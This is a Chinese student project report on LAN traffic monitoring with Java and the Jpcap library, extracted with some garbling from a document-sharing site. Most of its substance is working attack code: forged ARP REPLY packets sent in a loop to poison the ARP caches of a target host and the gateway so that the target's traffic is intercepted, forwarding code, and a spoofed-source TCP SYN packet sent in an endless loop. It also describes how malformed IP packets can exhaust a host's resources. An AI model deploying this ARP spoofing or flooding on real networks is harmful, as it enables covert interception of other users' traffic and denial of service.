2022年网络流量监控 .pdf

《2022年网络流量监控 .pdf》由会员分享，可在线阅读，更多相关《2022年网络流量监控 .pdf（28页珍藏版）》请在淘文阁 - 分享文档赚钱的网站上搜索。

1、网络流量监控组长 ：李天翼组员 ：网络流量监控：主要实现了在局域网中，使用路由器上网，能够把整个局域网的计算机的据包，截获然后转发， 根据截获的数据包，来进行流量的监控。进一步能够实现对流量的控制。在 java 程序中要实现数据包截获，转发等操作必须了解一下JPCAP。JPCAP：1.Jpcap类库介绍11 Jpcap的使用Jpcap 是 2003 年日本开发的一套能够捕获、发送网络数据包的java 类库。因为核心Java API 不能访问底层的网络数据，但 Jpcap是一种提供在Windows 或 UNIX 系统上进行这种访问的 Java API。Jpcap 不是一种纯粹的Java 解决方案

2、， 它依赖本地库的使用。在 Windows 或UNIX上，你必须有必要的第三方库，分别是WinPcap 或 libpcap。要在java 中使用Jpcap类库需要安装Jpcap的运行和开发环境。12 Jpcap介绍Jpcap 类库的基本结构如下图：Jpcap 类库结构1.2.1 Packet 基类及其子类Packet 这个类是所有被捕获的数据包的基类，可以提供被捕获数据包的长度，被捕获数据包的时间标记等基本信息。ARPPacket 和 IPPacket 是继承Packet 的子类，它们将被捕获包分成两类。ARPPacketJpcapHandler IPAddress IPv6Option Jp

3、cap JpcapWriter JpcapSender DatalinkPacket EthemetPacket Packet ARPPacket IPPacket ICMPPacket UDPPacket TCPPacket 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 1 页，共 28 页 - - - - - - - - - 按照 ARP 数据报的内容，将其各数据段的数据取出。IPPacket 则被分得更细。这两个类主要与是与数据链路层密切相关的，其与MAC 地址相关的信息在E

4、themetPacket 类中表示出来。 EthemetPacket 是从 DatalinkPacket 继承而来的。IPPacket 下有三个子类，分别是ICMPPacket、TCPPacket、UDPPacket。这三个类分别表示的是被存储在IP 数据报的报文中发送的ICMP 、TCP、UDP 报文。1.2.2 Jpcap 的主要功能Jpcap 提供了十分方便的数据包捕获方法。Jpcap 使用一个事件模型来处理包。首先，必须创建一个执行接口jpcap.JpcapHandler 的类。public class Jpcaphandler implements JpcapHandler publ

5、ic void handlePacket(Packet packet) System.out.println(packet); 为 了 捕 获 包 ， 需 要 让Jpcap知 道 要 用 哪 个 网 络 设 备 来 监 听 。 API提 供 了jpcap.Jpcap.getDeviceList() 方法以满足这一目的。这个方法返回一列字符串，可以按一下方法如下使用它：String devices = Jpcap.getDeviceList(); 一旦有了一个设备名称的目录，只要从其中选取一个用来监听：String deviceName = devices0; 选择一个设备之后，通过Jpcap.

6、openDevice()方法打开它。 openDevice() 方法需要四个参数：即将打开的设备名，从设备上一次读取的最大字节数，说明是否将设备设为混杂模式的Boolean 值，和以后调用processPacket()方法要使用到的超时值。Jpcapjpcap = Jpcap.openDevice(deviceName, 1024, false, 10000); openDevice()方法将一个参数返回到用以捕获的Jpcap 对象。既然有了 Jpcap 实例，你可以调用 processPacket() 或 loopPacket() 开始监听了。这两种方式都带有两个参数：捕获的最大包数可以是

7、-1（说明没有限制） ；执行 JpcapHandler 的一个类的实例。如果你调用processPacket()，那么 Jpcap 将一直捕获包，直到超过openDevice 中规定的时限名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 2 页，共 28 页 - - - - - - - - - 或达到了规定的最大包数。loopPacket()则将一直捕获包，直到达到最大包数，如果没有最大数限制，它将永远运行下去。就像下面这样调用：jpcap.loopPacket(-1, new Jpc

8、aphandler(); 对于捕获的数据包，可以利用Jpcap 中的 Packet 及其子类进行分类分析，获得数据包的详细信息。Jpcap 还有进行数据包过滤的函数setFilter(java.lang.String condition, boolean optimize)。其中 condition 是过滤条件。在进行数据包捕获前设置过滤条件，可以将不感兴趣的数据包剔除。jpcap.setFilter(host 210.212.147.149,true); 因为 Jpcap对数据包进行了分类，而数据包中的关键字段也有接口调用，所以在设置过滤条件时也可以在利用这些条件进行更细致的分类。这将在后面

9、的章节中介绍。Jpcap还提供了用来发送数据包的一个类JpcapSender， 可以用来发送IPPacket 及其子类，包括IPPacket、ICMPPacket 、 TCPPacket、UDPPacket。定义好一个相应的包后，就可以利用 sendPacket函数发送数据包。JpcapSender sender=JpcapSender .openDevice(Jpcap.getDeviceList()0); sender .sendPacket(p); /send a packet 上面是对JPCAP 的基本介绍。这是这个程序的基础。2.数据包监听原理网络监听是指利用计算机的网络接口截获目的

10、地为第三方计算机的数据报文的一种技术。利用这种技术可以监听网络的当前流量状况；网络程序的运行以及非法窃取网络中传输的机密信息。在共享式以太网中，所有的通讯都是广播的，也就是说通常在同一网段的所有网络接口都可以访问在物理媒体上传输的所有数据，使用ARP和RARP协议进行相互转换。在正常的情况下， 一个网络接口应该只响应两种数据帧：与自己硬件地址相匹配的数据帧和发向所有机器的广播数据帧。在一个实际的系统中，数据的收发由网卡来完成。每个以太网卡拥有一个全球难一的以太网地址。以太网地址是一个48位的二进制数。 在以太网卡中内建有一个数名师资料总结 - - -精品资料欢迎下载 - - - - - - -

11、 - - - - - - - - - - - 名师精心整理 - - - - - - - 第 3 页，共 28 页 - - - - - - - - - 据报过滤器。该数据报过滤器的作用是保留以本身网卡的MkC地址为通讯目的的数据报和广播数据报， 丢弃所有其它无关的数据报，以免除 CPU对无关的数据报作无谓的处理。这是以太网卡在一般情况下的工作方式。在这种方式下， 以太网卡只将接收到的数据报中与本机有关部分向上传递。然而数据报过滤器是可以通过编程禁用的。禁用数据报过滤器后，网卡将把接收到的所有的数据报向上传递，上一层的软件因此可以监听以太网中其它计算机之间的通讯。我们称这种工作模式为“ 混杂模式

12、” 。多数网卡支持“ 混杂模式 ” ，而该模式还是微软公司的 “pC 99” 规范中对网卡的一个要求。网卡的 “ 混杂模式 ” 使得采用普通网卡作为网络探针，实现网络的侦听变得非常容易。一方面方便了网络管理，另一方面， 普通用户也能轻易地侦听网络通讯，对用户的数据通讯保密是一个很大的威胁。在进行此种方式的数据监听时，是在网络的节点处设置网络设备为混杂模式，进行数据监听管理网络； 黑客则是利用ARP侦探网络上出于混杂模式的网络节点并将黑客软件放置在节点处进行窃听的。还有一种窃听方式是利用ARP欺骗达到的。 ARP欺骗又被称为ARP重定向技术， ARP地址解析协议虽然是一个高效的数据链路层协议，但

13、是作为一个局域网的协议，它是建立在各主机之间互相信任基础之上的，因此存在一定的安全问题：（1）主机地址映射表是基于高速缓存动态更新的，这是ARP协议的特色，也是安全问题之一。由于正常的主机间MAC 地址刷新都是有时限的，这样假冒者如果在下次更新之前成功的修改了被攻击机器上的地址缓存，就可以进行假冒。（2）ARP请求以广播方式进行。这个问题是不可避免的，因为正是由于主机不知道通信对方的MAC 地址，才需要进行ARP广播请求。这样攻击老就可以伪装 ARP应答， 与广播者真正要通信的机器进行竞争。还可以确定子网内机器什么时候会刷新MAC 地址缓存，以确定最大时间限度的进行假冒。（3）可以随意发送AR

14、P应答包。由于ARP协议是无状态的，任何主机即使在没有请求的时候也可以做出应答，只要应答有效， 接收到应答包的主机就无条件的根据应答包的内容更新本机高速缓存。（4） ARP应答无需认证。由于 ARP协议是一个局域网协议，设计之初，出于传输效率的考虑，在数据链路层就没有作安全上的防范。在使用ARP协议交换 MAC 地址时无需认证，只要收到来自局城网内的ARP应答包，就将其中的MAC IP对刷新到本主机的高速缓存中。ARP重定向的实施办法是根据以上ARP地址解析协议的安全漏洞，进行网络信息包的截获以及包的转发攻击活动，步骤如下： （1）把实施攻击的主机的网卡设置为混杂模式。（ 2）在实施攻击的主机

15、上保持一个局域网内各个IPMkC 包的对应列表， 并根据截获的IP包或者ARP包的原 IP域进行更新。 （3）收到一个 IP包之后， 分析包头， 根据IP包头里的 IP目的地址，名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 4 页，共 28 页 - - - - - - - - - 找到相应的 MAC 地址。（ 4）将本机的 MAC 地址设成原 MAC 地址，将第二步查到的MAC 地址作为目的 MAC 地址，将收到的IP包发送出去。通过以上的重定向，攻击者使网络数据包在经过攻击者本身

16、的主机后，转发到数据包应该真正到达的目的主机去，从而具有很强的欺骗性。本文中采用的是第二种方法，即在共享以太网中通过ARP欺骗，监听整个以太网的数据包。ARP 欺骗的详细原理：局域网监听利用的是所谓的“ARP欺骗”技术。在以前曾经一段阶段，局域网的布局是使用总线式 （或集线式） 结构，要到达监听只需要将网卡设定为混杂模式即可，但现在的局域网络普遍采用的是交换式网络，所以单纯靠混杂模式来达到监听的方法已经不可行了。 所以为了达到监听的目的， 我们需要“欺骗”路由器、“欺骗”交换机，即“ ARP欺骗”技术。假设本机为 A，监听目标为 B。首先，伪造一个 ARP REPLY 包，数据链路层头及ARP

17、内容部分的源 MAC 地址填入 A的 MAC 地址，而源 IP 部分填入网关 IP，目的地址填入 B的 MAC 、IP，然后将这个包发送给B，而 B接收到这个伪造的ARP REPLY 包后，由于源 IP 为网关 IP，于是在它的 ARP缓存表里刷新了一项，将（网关IP，网关 MAC ）刷新成（网关 IP，A的 MAC ）。而 B要访问外部的网都需要经过网关，这时候这些要经过网关的包就通通流到A的机器上来了。接着，再伪造一个ARP REPLY 包，数据链路层头及ARP 内容部分的源 MAC地址填入 A的 MAC 地址，而源 IP 部分填入 B的 IP，目的地址填入网关MAC 、IP，然后将这个包

18、发给网关，网关接收到这个伪造的ARP REPLY 包后，由于源 IP 为B的 IP，于是在它的 ARP缓存表里刷新了一项，将（B的 IP，B的 MAC ）刷新成（B的 IP，A的 MAC ）。这时候外部传给B的数据包经过网关时，就通通转发给A。这样还只是拦截了B的数据包而已， B并不能上网解决方法是将接收到的包，除了目的地址部分稍做修改，其它原封不动的再转发出去，这样就达到了监听的目的在B不知不觉中浏览了B所有的对外数据包。名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 5 页，共

19、28 页 - - - - - - - - - ARP 数据包解析单元： Byte Ethernet 头部ARP 数据部分6 6 2 2 2 2 2 4 6 4 6 目标MAC地址源地MAC地址类型号0 x0800:ip 0 x0806:ARP 局域网类型以太网0 x0001 网络协议类型IP 网络0 x0800 MAC/IP地址长度，恒为0 x06/04 ARP 包类型REPLY 0 x0002 ARP目标IP地址ARP目标MAC 地址ARP源IP地址ARP源MAC地址2用 JPCAP 实现监听就如上面说的，为了实现监听，我们必须做四件事：A发送 ARP包修改 B的 ARP缓存表；B发送 AR

20、P包修改路由 ARP缓存表；C转发 B发过来的数据包；D转发路由发过来的数据包3.程序详细设计这个程序主要就是发送ARP 数据包，欺骗路由器。1.要知道整个局域网内IP 地址范围。对于这个问题，我们首先要知道局域网的子网掩码，和网关地址，然后通过这两个部分获取整个局域网内能够设置的IP 地址。获取子网掩码，调用系统的ipconfig/all 命令就能够获取到子网掩码public String SubnetMask() String mask; exec =cmd /c ipconfig /all; /获取子网掩码Run(); try while( true) 名师资料总结 - - -精品资料欢

21、迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 6 页，共 28 页 - - - - - - - - - String s; s=br .readLine(); if(s= null) break; if(s.contains(Subnet Mask) mask=s.substring(s.indexOf(: )+2); return mask; catch(IOException ex) ex.printStackTrace(); returnnull; 1.获取网关地址，调用熊的IPCONFIG/ALL命令就能够

22、获取网关IP。2.然后通过子网掩码，与上网关地址，就能够获取开始以及结束IP 地址了。2.获取存活的计算机。获取存活的IP 地址1.可以使用InetAddress 的 ISRESEARCH() 函数来判定这个IP 地址是否能够PING 通。但是有时候不能够准确的确定该IP 地址的存活。因此我没有使用这个函数来确定，是否存活。2.我调用了系统自带的PING 命令来判定该IP 地址是否存活。在这其中使用过了线程池来调用PING 命令来判断IP 地址存活。如果不使用多线程来PING ，程序速度将会很慢，因此我使用了多线程，要寻找出所有的IP 地址，就要使用多线程来PING ，否则速度很慢。线程池类为

23、 java.util.concurrent.ThreadPoolExecutor ，常用构造方法为：ThreadPoolExecutor(int corePoolSize, int maximumPoolSize, long keepAliveTime, TimeUnit unit, BlockingQueue workQueue, RejectedExecutionHandler handler) 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 7 页，共 28 页 - - - -

24、 - - - - - corePoolSize ： 线程池维护线程的最少数量maximumPoolSize ：线程池维护线程的最大数量keepAliveTime ： 线程池维护线程所允许的空闲时间unit ： 线程池维护线程所允许的空闲时间的单位workQueue ： 线程池所使用的缓冲队列handler ： 线程池对拒绝任务的处理策略一个任务通过 execute(Runnable) 方法被添加到线程池，任务就是一个 Runnable 类型的对象，任务的执行方法就是 Runnable 类型对象的 run() 方法。当一个任务通过execute(Runnable) 方法欲添加到线程池时：l 如果

25、此时线程池中的数量小于corePoolSize ，即使线程池中的线程都处于空闲状态，也要创建新的线程来处理被添加的任务。l 如果此时线程池中的数量等于 corePoolSize ，但是缓冲队列 workQueue 未满，那么任务被放入缓冲队列。l 如果此时线程池中的数量大于corePoolSize ，缓冲队列 workQueue 满，并且线程池中的数量小于maximumPoolSize ，建新的线程来处理被添加的任务。l 如果此时线程池中的数量大于corePoolSize ，缓冲队列 workQueue 满，并且线程池中的数量等于maximumPoolSize ，那么通过 handler 所指

26、定的策略来处理此任务。也就是：处理任务的优先级为：核心线程corePoolSize 、任务队列 workQueue 、最大线程 maximumPoolSize ，如果三者都满了，使用handler 处理被拒绝的任务。l 当线程池中的线程数量大于 corePoolSize 时，如果某线程空闲时间超过keepAliveTime ，线程将被终止。这样，线程池可以动态的调整池中的线程数。名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 8 页，共 28 页 - - - - - - - - -

27、unit 可选的参数为 java.util.concurrent.TimeUnit 中的几个静态属性：NANOSECONDS 、MICROSECONDS 、MILLISECONDS 、SECONDS 。workQueue 常用的是： java.util.concurrent.ArrayBlockingQueue handler 有四个选择：ThreadPoolExecutor.AbortPolicy() 抛出 java.util.concurrent.RejectedExecutionException 异常ThreadPoolExecutor.CallerRunsPolicy() 重试添加当

28、前的任务，他会自动重复调用execute() 方法ThreadPoolExecutor.DiscardOldestPolicy() 抛弃旧的任务ThreadPoolExecutor.DiscardPolicy() 抛弃当前的任务http:/ TTL ：255 Protocol：unknow （230）IP 包 2： 110.110.17.101210.40.7.149 TTL ：254 Protocol：unknow （230）ICMP 包： 210.40.7.149110.110.17.101 type：3 code：2 可以看到带有非正常协议的IP 数据包到达了目的主机，主机对此进行了回执

29、。具体的过程是发送的数据包为IP 包 1，先经过路由器，TTL 衰减一次，成为IP 包 2，到达数据包目的地 IP 为 210.40.7.149 的主机。这时由于IP 数据报中的协议字段为未知协议，但IP 校验和无误，因此系统不会丢弃数据包，但也无法确定要把此IP 数据报往上层的哪个应用程序接收。系统认为此IP 数据报的协议没有被传送或不支持此协议，便发送一个指向伪IP(110.110.17.101)的 ICMP 包。ICMP 中字段 type 为 3 表示 IP 数据报到达不了接收端，code为 2 表示是协议无法到达。如果构造一个正常的IP 数据报，协议字段写入已定义的上层字段，如 TCP

30、 协议或 ICMP协议，就需要构造TCP 数据报或ICMP 数据报等相应数据段。而如果不进行相应协议数据报的构造或直接置空，则发送数据包到达目的主机后将会被舍弃，系统不进行任何处理。正常 IP 数据报非正常 IP 数据报协议字段TCP(6) Unknow(230) 数据段有数据 (自定义 ) 数据包错误数据包正常数据段无数据畸形数据包数据包正常接收端处理丢弃回执 ICMP 接收主机系统资源占用率约上升 5约上升 20由此可以看出，因为IP 数据报中的协议字段只对首部进行检验，所以只要保证首部无误就可以进行数据包传送。而在协议字段中代表的协议编号目前并没有全部分配，恶意构造含有名师资料总结 -

31、- -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 12 页，共 28 页 - - - - - - - - - 未分配协议字段的IP 数据报对目的主机发送，会使得接收主机的系统资源大量耗费，甚至当机。构造发送 TCP 数据包 :TCP 数据报是被封装在IP 数据报的数据段中的，要发送TCP 数据包，必须先构造IP数据报，然后构造TCP 数据报，将其发入IP 数据包的数据段，进行发送。构造TCP 数据报在 Jpcap中利用 TCPPacket 类直接构造。各个变量的含义如下：TCPPacket (int s

32、rc_port, 源 IP int dst_port, 目的 IP long sequence, 顺序号long ack_num, 确认号boolean urg, 紧急数据标志boolean ack, 确认号有效标志boolean psh, 传送强制功能标志boolean rst, 请求连接重设标志boolean syn, 请求顺序号同步处理标志boolean fin, 发送结束标志boolean rsv1, RSV1 标志boolean rsv2, RSV2 标志int window, 窗口大小int urgent) 紧急数据指针构造 TCP 数据包要保证校验和正确，才能被正确传送。由于TC

33、P 数据报的校验和字段在 Jpcap 中被封装，所以无法实现正确TCP 数据包的传输。校验和不正确的数据包还是可以在网络中传输的，但无法被接收。/发送 TCP 数据包import jpcap.*; class tcp public static void main(String args) throws java.io.IOException JpcapSender sender=JpcapSender .openDevice(Jpcap.getDeviceList()0); 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师

34、精心整理 - - - - - - - 第 13 页，共 28 页 - - - - - - - - - /build tcpPacket TCPPacket p; p= new TCPPacket(80,237,123,0,false,false,false,false,true,false,false,false,1024,0); p.setIPv4Parameter(0,false,false,false,0,true,false,false,2,1,255,6, new IPAddress(viripi),new IP Address(210.40.7.149); p.data=.getB

35、ytes(); while(true) sender.sendPacket(pj); 5.2.2 发送结果分析上一小节中构造了一个标识为SYN 的 TCP 包，其中包含错误的校验和。将TCP 包放入到伪装的IP 报文的数据段。其中的源IP 为伪造 IP，目的 IP 为同局域网中的一真实IP，然后在主机A 进行发送。预测结果是形成无用数据包，仅造成网络阻塞。在以太网主机B中进行数据包捕获，发现每发送一个数据包，可以捕获到两个类似的数据包，数目增加了一倍。经过研究发现，两个数据包并非完全一样，其以太网帧中的源MAC 地址和目的MAC地址并不相同。主机A 发送的数据包其源MAC 地址为本机MAC 地

36、址，目的MAC 地址为以太网网关MAC 地址；另一数据包源MAC 地址为网关MAC 地址，目的MAC 地址为原来要发送目的主机的MAC 地址。这种情况发生在伪装IP 不是内部IP 的情况下，当伪装为内部 IP 时并没有这种情况。经过仔细分析，发现在发送IP 数据包前进行以太网帧的打包时，系统会先进行询问源IP 所在位置的MAC 地址为多少的ARP 请求， 此时如果得不到应答，此数据包直接被丢弃。如果有应答，则按源IP 分为两种情况。源IP 为内网 IP 则将 MAC 地址放在目的MAC 地址进行发送。此时因为TCP 校验和错误，到达后数据包被丢弃，但可以捕获到一次数据包发送。源 IP 为外部，

37、 则将数据包目的MAC 地址赋值为目的MAC 地址进行发送。 当数据包到达网关时，网关对目的IP 进行检查，发现为内部IP，于是将目的MAC 地址改为要发送IP地址的正确MAC 地址，向内网发送。此时，在网关不会进行TCP 校验和的检验。于是在局域网内便捕获到两次发送的数据包。在网关的帮助下，数据包被重复发送了一次，使无用名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 14 页，共 28 页 - - - - - - - - - 数据包被加倍，这样就使得网络充斥着加倍的无用数据包，带宽

38、被降低。4最关键的部分，也是整个程序最重要的地方，就是构造ARP 包，来欺骗主机，以及网关。首先构造 ARP 包public changeARP(byte targetMAC, String targetIp,byte gateMAC, String gateIp) throws UnknownHostException,InterruptedException this. targetMAC = targetMAC; this. targetIp = targetIp; this. gateMAC = gateMAC; this. gateIp = gateIp; getDevice();

39、arpTarget = new ARPPacket(); /修改 B 的 ARP 表的 ARP 包arpTarget.hardtype = ARPPacket.HARDTYPE_ETHER;/选择以太网类型(Ethernet) arpTarget.prototype = ARPPacket.PROTOTYPE_IP ; / 选择 IP 网络协议类型arpTarget.operation = ARPPacket.ARP_REPLY ; /选择 REPLY 类型arpTarget.hlen = 6 ; /MAC 地址长度固定6 个字节arpTarget.plen = 4; /IP 地址长度固定4

40、个字节arpTarget.sender_hardaddr = device.mac_address; /A 的 MAC 地址arpTarget.sender_protoaddr = InetAddress.getByName(gateIp).getAddress(); /网关 IParpTarget.target_hardaddr = targetMAC; /B 的 MAC 地址arpTarget.target_protoaddr = InetAddress.getByName(targetIp).getAddress(); /B 的 IPEthernetPacket ethToTarget

41、= new EthernetPacket(); /创建一个以太网头ethToTarget.frametype = EthernetPacket.ETHERTYPE_ARP;/选择以太包类型ethToTarget.src_mac = device.mac_address; /A 的 MAC 地址ethToTarget.dst_mac = targetMAC; 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 15 页，共 28 页 - - - - - - - - - /B 的 MAC 地

42、址arpTarget.datalink = ethToTarget; /将以太头添加到ARP 包前arpGate = new ARPPacket(); /修改网关 ARP 表的包arpGate.hardtype = ARPPacket.HARDTYPE_ETHER ; / 跟以上相似，不再重复注析arpGate.prototype = ARPPacket.PROTOTYPE_IP; arpGate.operation = ARPPacket.ARP_REPLY ; arpGate.hlen = 6; arpGate.plen = 4; arpGate.sender_hardaddr = dev

43、ice.mac_address; arpGate.sender_protoaddr = InetAddress.getByName(targetIp).getAddress(); arpGate.target_hardaddr = gateMAC; arpGate.target_protoaddr = InetAddress.getByName(gateIp).getAddress(); EthernetPacket ethToGate = new EthernetPacket(); ethToGate.frametype = EthernetPacket.ETHERTYPE_ARP; eth

44、ToGate.src_mac = device.mac_address; ethToGate.dst_mac = gateMAC; arpGate.datalink = ethToGate; 然后对每一个存活的ip 地址发送ARP 包。thread=new Thread(new Runnable() /创建一个进程控制发包速度public void run() while (true) sender.sendPacket(arpTarget); sender.sendPacket(arpGate); Thread.sleep(500); ).start(); 在这里要创建一个进程来发送ARP

45、包。因为ARP 表每隔一段时间就要刷新一次，因此程序要隔一段时间就发送一个ARP 包。来更新ARP 缓存表。4.到了这里整个ARP 欺骗就已经完成了，可以自由的获取想要获取的IP 地址的数据包了流量分析在能够获取以太网上的数据包后，进行流量分析是十分必要的。通常的网络数据流量的测量方法是按照一定的时间间隔得出一个平均负载。所以首先要获得数据包大小的数据再进行进一步的计算。new flux(); try /获取设备的链接getDevices(); 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - -

46、 - 第 16 页，共 28 页 - - - - - - - - - catch (IOException e) e.printStackTrace(); /定义一个 IPPACKET 数据包IPPacket ipPacket = null; /第一一个日期Date time = new Date(); long now,before; /获取当前时间，以毫秒表示now = time.getTime(); before = now; while( true) time = new Date(); now = time.getTime(); /2秒刷新一次流量if(now - before =

47、2000) tf_upload.setText(String.valueOf( paket_flux_upload); tf_download.setText(String.valueOf( paket_flux_download); before = now; /System.out.println(paket_flux_upload/2048+ + paket_flux_download/2048);paket_flux_upload = 0; paket_flux_download = 0; /截取数据包ipPacket =(IPPacket)Captor.getPacket(); /S

48、ystem.out.println(ipPacket); 数据包大小的表示数据包的大小在Jpcap的 Packet 类中有直接的字段来表示，单位为字节。 Packet 类是可以包含所有被捕获包类型的，只要进行连续的数据包监听，那几乎所有的网络数据包都会捕获并在 Packet 类中存放其长度。long packet_flux=packet.len; 这只是一个数据包的长度，只要再将每秒中数据报长度进行累加就可以得到这一秒的平名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 17 页，共

49、28 页 - - - - - - - - - 均流量，修改为：long packet_flux+=packet.len; 时间利用java.util 中的 date类来控制，每一秒得到数据包累加结果后，进行一次输出。40303 35601 22767 62 44728 27378 23667 31671 1514 33321 上面是随机取得的连续十次每秒数据包流量。因为流量分析是进行统计，数据并不需要完全的精确，而且如果采用字节/秒为单位也不方便，因此采用千字节/秒的单位，上述数据处理得到如下结果：40 37 23 0 45 27 24 32 2 33 这时的网络是出于空闲状态，其中的数据包主

50、要是一些广播的ARP 数据包。 当网络繁忙时，再取得一组数据如下：830 768 838 854 988 1139 1170 1174 1141 1157 1084 这是在以太网内部进行文件传输时得到的数据，这时可以利用这些数据进行更直观的图形显示或其他相关操作。在接收到数据包以后，还要将数据包转发。否则将会使局域网的计算机无法上网。转发的代码：privatevoid send(Packet packet, byte changeMAC) EthernetPacket eth; if (packet.datalinkinstanceof EthernetPacket) eth=(Etherne